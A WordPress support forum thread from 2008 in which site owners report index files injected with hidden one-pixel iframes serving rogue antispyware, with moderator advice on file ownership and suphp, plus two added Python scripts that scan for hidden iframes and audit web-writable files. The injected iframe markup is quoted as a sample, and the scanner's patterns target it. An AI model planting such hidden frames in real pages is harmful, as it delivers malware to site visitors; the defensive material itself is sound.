Malware Installed on WP sites

  • I run several WP sites varying from v2.2.1 to v2.6. All have been attacked/hacked with the intent of downloading malware to the user’s computer. This started on the 17th Oct. I fixed it and they were again attacked on the 18th.

    They seem to get in at will, not only WP, but html index pages seem to be no problem. The objective is to download XP AntiSpyware 2009, a variation on the AntiSpyware XP 2008 rogue a couple of months ago.

    This is how index.php is changed, I have bolded the added code:

    /* Short and sweet */
    define('WP_USE_THEMES', true);
    ?><html><body><iframe src="" width=1 height=1 style="visibility: hidden"></iframe><iframe src="" width=1 height=1 style="visibility: hidden"></iframe></body></html>

    The permissions on this were set to 644; owner read/write, others read only. How can I stop this happening? Although I have the tools to remove this trojan, visitors to my sites may not.

Viewing 7 replies - 1 through 7 (of 7 total)
  • You should contact your host immediately as all shared servers are probably experiencing this. I would guess they are getting in somewhere in the server (an unsecure site).
    Check your server logs, also.



    This is not a WordPress issue only.

    I had this happen on sites that are not WP-powered too. And on four different servers, on absolutely all the sites I run – whether it’s for work or for personal pleasure, whether I’m the owner of the site or I just set it up for someone else.

    As it is fairly impossible that some random Chinese spammer knows that the same person is running all those sites, I assume something’s getting through exploit holes in the system itself, hacking the computer owner’s FTP password (I think?) and they’re adding

    <html><body><iframe src="" width=1 height=1 style="visibility: hidden"></iframe></body></html>

    …or whatever else to EACH SINGLE index.php, index.htm, index.html they find. And this is an enormous pain, as they e.g. find each single index on the server; most BBS scripts have those in all folders. 🙁

    I had this happen last Friday while my computer was on and I was away; I installed all Windows updates. However, it happened again tonight and, yet again, it affected sites on four servers, hosted by four different hosting companies. This is insane. I don’t even know whom to ask about it anymore. Would not storing my FTP passwords in my FTP client help? How can they get in when the computer is off?



    Oh, and just to add: last week, my friend’s website on my server was the only one spared. This time, when I had its FTP info in my FTP client, it got hacked too. That’s why I think it has nothing to do with servers themselves.

    Samuel B


    >That’s why I think it has nothing to do with servers themselves.

    Exactly! And that’s why you should be on your host’s butt about this.

    Moderator Samuel Wood (Otto)

    (@otto42) Admin

    >…or whatever else to EACH SINGLE index.php, index.htm, index.html they find.

    This is an almost certain indication that they hacked into one of the sites on the shared server and then proceeded to run a script which searched the system and simply added that code to every index file it found that was writable.

    Your files should NOT be writable by the webserver user. That’s your fundamental problem here. On a shared host, when somebody gets in via one door, then they can access all the sites on that host. So you not only need to secure the host itself, but also each site needs to secure itself in case one of the other sites gets hacked.

    This is the most common way for a site to get hacked, actually. I like to use suphp to work around this sort of thing and get the best of both worlds (suphp runs the php process as the owner of the php file, thus limiting damage to that site only), but different people disagree.
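
    The mass index-file injection described above can be detected with a scan like the following. This is an added example, not part of the original thread or any poster's code; the function names and the two sample byte strings are constructed for illustration.

```python
import os
import re

INDEX_NAMES = {"index.php", "index.htm", "index.html"}
IFRAME_TAG = re.compile(rb"<iframe\b[^>]*>", re.I)
# Traits of the injected frames quoted in this thread: hidden, or 0/1 pixel in size.
HIDDEN_TRAITS = [
    re.compile(rb"visibility\s*:\s*hidden", re.I),
    re.compile(rb"""\b(?:width|height)\s*=\s*["']?[01](?![\d.%])""", re.I),
]

# Constructed samples: an index.php with the appended frame, and a normal embed.
SAMPLE_INFECTED = (b"<?php\n/* Short and sweet */\ndefine('WP_USE_THEMES', true);\n"
                   b'?><html><body><iframe src="" width=1 height=1 '
                   b'style="visibility: hidden"></iframe></body></html>')
SAMPLE_CLEAN = b'<html><body><iframe src="/map" width="600" height="100%"></iframe></body></html>'


def hidden_iframes(data):
    """Return the <iframe ...> opening tags in data that are made invisible."""
    return [m.group(0).decode("utf-8", "replace")
            for m in IFRAME_TAG.finditer(data)
            if any(trait.search(m.group(0)) for trait in HIDDEN_TRAITS)]


def scan(root):
    """Map relative path -> suspicious tags for every index file under root."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in INDEX_NAMES:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    hits = hidden_iframes(fh.read())
            except OSError:
                continue  # unreadable file: skip it rather than abort the scan
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


if __name__ == "__main__":
    import sys
    for path, tags in scan(sys.argv[1]).items():
        print(path, tags)
```

    A hit is a lead to review by hand, since some legitimate widgets also use tiny or hidden frames.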



    >Your files should NOT be writable by the webserver user.

    With all due respect, most major web hosting companies like LunarP and HMonster don’t allow shared server users to set the CHMOD to lower than 644 or 600. I don’t know for small ones, though.

    Moderator Samuel Wood (Otto)

    (@otto42) Admin

    644 should be safe as long as the files are owned by the user himself, and not by the webserver user.

    My files look like this:

    drwxr-xr-x 2 otto group   4096 2008-10-15 10:07 directory
    -rw-r--r-- 1 otto group 123456 2008-10-23 10:12 file.php

    The webserver runs as apache/apache. It can’t write to my files.

    Now, this is a bit of a problem, since automatic upgrades and such won’t work properly. So, I run suphp, which makes the php processes run as me, otto. So now the webserver can write to my files. But, and this is important, it can’t write to anybody else’s files on the machine. So an attack on one of my sites is limited to that site and that site only.
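
    The ownership point made above (644 is only safe when the web server account is not the file owner) can be checked across a whole web root. This is an added example, not code from the thread; `writable_by` and `audit` are hypothetical names, and the account name passed on the command line is whatever your server runs as.

```python
import os
import stat


def writable_by(st, uid, gids):
    """True if a process with this uid/gids may write, per Unix mode-bit rules."""
    if uid == 0:
        return True                                # root bypasses mode bits
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)     # owner class applies, nothing else
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit(root, web_uid, web_gids=frozenset()):
    """Return sorted relative paths under root that the web server account can modify.

    Directories are included: write access to a directory allows replacing
    the files inside it, whatever their own modes are.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue                           # symlink mode bits are not meaningful
            if writable_by(st, web_uid, web_gids):
                findings.append(os.path.relpath(path, root))
    return sorted(findings)


if __name__ == "__main__":
    import grp
    import pwd
    import sys
    # Usage: audit.py /path/to/webroot apache
    account = pwd.getpwnam(sys.argv[2])
    groups = {account.pw_gid} | {g.gr_gid for g in grp.getgrall()
                                 if account.pw_name in g.gr_mem}
    for rel in audit(sys.argv[1], account.pw_uid, groups):
        print("web-writable:", rel)
```

    Under a suphp-style setup the PHP process runs with the owner's uid, so every owner-writable path is reported for that uid; that is the trade-off the post describes.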

  • The topic ‘Malware Installed on WP sites’ is closed to new replies.